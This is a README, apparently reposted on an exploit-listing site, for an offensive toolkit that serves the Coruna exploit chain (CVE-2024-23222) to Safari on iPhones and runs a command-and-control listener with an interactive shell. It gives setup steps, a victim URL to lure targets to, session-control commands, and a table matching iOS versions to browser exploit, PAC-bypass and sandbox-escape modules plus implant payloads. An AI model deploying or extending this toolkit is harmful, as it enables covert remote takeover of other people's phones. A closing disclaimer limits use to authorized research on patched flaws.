Share
## https://sploitus.com/exploit?id=472EEC26-F9C7-50CA-A4D6-2E1879CAC2F3
# iOS Orchestrator โ Coruna
Web server, C2 listener, and interactive shell for the **Coruna** exploit chain (CVE-2024-23222). Targets Safari on iOS 13โ17.2.1. Drive-by only: the victim opens a single URL in Safari; no reverse shell or custom app required for the browser stage.
## Requirements
- **Python 3.8+**
- Dependencies: `pip install -r requirements.txt`
## Quick start
1. **Config** โ Copy `config.json.example` to `config.json` (optional; defaults work for localhost).
2. **Run** โ From the `ios_orchestrator` directory: `python main.py`
3. **Target** โ On a vulnerable iPhone, open `http://YOUR_IP/coruna/group.html` in Safari (HTTP only; ensure port 80 is reachable).
4. **Shell** โ When a session appears, use the console:
```
(coruna)> list
[abc12345] 192.168.1.10 2024-03-13 14:30:00
(coruna)> use abc12345
(shell)> id
(shell)> exit
```
## Console commands
| Command | Description |
|-------------|----------------------------|
| `list` | List active C2 sessions |
| `use ` | Attach to session shell |
| `help` | Show help |
| `quit` | Shut down server and exit |
## Configuration
Edit `config.json` (create from `config.json.example` if needed):
| Key | Description | Default |
|------------------------|--------------------------------------|----------------|
| `c2_bind` | C2 listener bind address | `0.0.0.0` |
| `c2_port` | C2 listener port | `8080` |
| `web_server_ip` | Web server bind address | `0.0.0.0` |
| `web_server_port` | Web server port | `80` |
| `exploit_templates_dir`| Path to exploit files (e.g. coruna) | `exploits/` |
| `static_files_dir` | Path for static assets | `web_server/static/` |
## Project layout
```
ios_orchestrator/
โโโ main.py # Entry point: web server, C2, console loop
โโโ config.json.example # Example config (copy to config.json)
โโโ requirements.txt
โโโ core/
โ โโโ config_manager.py # Config load/save and defaults
โโโ web_server/
โ โโโ exploit_http_server.py # Serves /coruna/ (group.html, Stage1/2/3, payloads)
โ โโโ static/ # Optional static assets
โโโ c2_comms/
โ โโโ c2_server.py # C2 TCP listener; attaches sessions
โ โโโ session.py # Session state and shell I/O
โโโ exploits/
โ โโโ coruna/ # Coruna exploit chain
โ โโโ group.html # Loader: fingerprint, Stage1/2/3 selection
โ โโโ platform_module.js
โ โโโ utility_module.js
โ โโโ Stage1_*.js # Browser primitives (cassowary, terrorbird, bluebird, jacurutu)
โ โโโ Stage2_*.js # PAC bypass (seedbell variants)
โ โโโ Stage3_VariantA.js / Stage3_VariantB.js
โ โโโ payloads/ # manifest.json, bootstrap.dylib, per-hash dylibs/bins
โโโ docs/
โโโ CVE-2024-23222_ANALYSIS.md
โโโ REVIEW.md
โโโ REPOS_ANALYSIS.md
โโโ THREE_REPOS_FILE_INVENTORY.md
```
## C2 and payloads
- Implants in `exploits/coruna/payloads/` may have a **hardcoded C2** in the binaries. If no session appears after a successful drive-by:
- Ensure port **8080** is open (or the port you set in `config.json`).
- The original kit may have used a different C2; the payloads are from the [khanhduytran0/coruna](https://github.com/khanhduytran0/coruna) payload set.
- This project does **not** implement a reverse shell for the initial compromise; the drive-by delivers the chain and the C2 receives connections from the implant.
## Exploit chain (Coruna)
- **Stage 1** โ WebKit/JSC exploit (version-dependent): gains arbitrary read/write via WASM-backed primitives.
- **Stage 2** โ PAC bypass (Intl.Segmenter / BreakIterator) where applicable.
- **Stage 3** โ Sandbox escape and payload delivery: loads `bootstrap.dylib`, feeds payloads from `payloads/manifest.json` and the per-hash directories.
### Vulnerable iOS versions and chains
Version selection is driven by `platform_module.js` (from the device user agent). Each range uses a specific Stage1 โ Stage2 โ Stage3 path.
#### Stage 1 (browser primitive)
| iOS version | Flag | Module | In repo |
|---------------|---------|---------------|---------|
| **16.6 โ 17.2.1** | JtEUci | cassowary | โ
|
| **16.2 โ 16.5.1** | KeCRDQ | terrorbird | โ
|
| **15.6 โ 16.1.2** | ShQCsB | bluebird | โ
|
| **15.2 โ 15.5** | RbKS6p | jacurutu | โ
|
| **11.0 โ 15.1** | mmrZ0r | 7d8f5baeโฆ | โ (404) |
#### Stage 2 (PAC bypass)
| iOS version | Flag | Module(s) | In repo |
|---------------|----------|-----------|---------|
| **17.0 โ 17.2.1** | wF8NpI | seedbell_pre โ seedbell (17.x) | โ
|
| **16.6 โ 16.7.12** | LJ1EuL | seedbell_pre โ seedbell (16.6โ16.7) | โ
|
| **16.3 โ 16.5.1** | CpDW_T | seedbell (16.3โ16.5.1) | โ
|
| **15.0 โ 16.2** | IqxL92 | breezy15 | โ
|
| **13.0 โ 14.x** | (default)| breezy | โ
|
#### Stage 3 (sandbox escape)
| Condition | Module |
|-------------------------|-----------|
| wC3yaB set and PAC OK | VariantA |
| Otherwise | VariantB |
**Example full chains:**
- **iOS 17.0:** cassowary โ seedbell_pre + seedbell (17.x) โ VariantA or VariantB
- **iOS 16.5:** terrorbird โ seedbell (16.3โ16.5.1) โ VariantB
- **iOS 16.7:** cassowary โ seedbell_pre + seedbell (16.6โ16.7) โ VariantB
- **iOS 15.4:** jacurutu โ breezy15 โ VariantB
- **iOS 14.x:** would use mmrZ0r (Stage1) โ breezy (Stage2) โ VariantB, but **mmrZ0r is missing** (404).
The **mmrZ0r** Stage1 (`7d8f5bae97f37aa318bccd652bf0c1dc38fd8396.js`) for **iOS 11โ15.1** is not present in public repos; devices in that range get a 404 for that module. See `docs/REPOS_ANALYSIS.md` and `docs/THREE_REPOS_FILE_INVENTORY.md` for details.
## Credits and references
- Exploit chain and payloads: [khanhduytran0/coruna](https://github.com/khanhduytran0/coruna) (local-hostable, deobfuscated; additional Stage modules from `other/`).
- Analysis and docs: see `docs/` and the repositories listed in `REPOS_ANALYSIS.md`.
## Disclaimer
This project is for **authorized security research and education** only. The vulnerabilities targeted have been patched by Apple. Do not use against systems or users without explicit permission.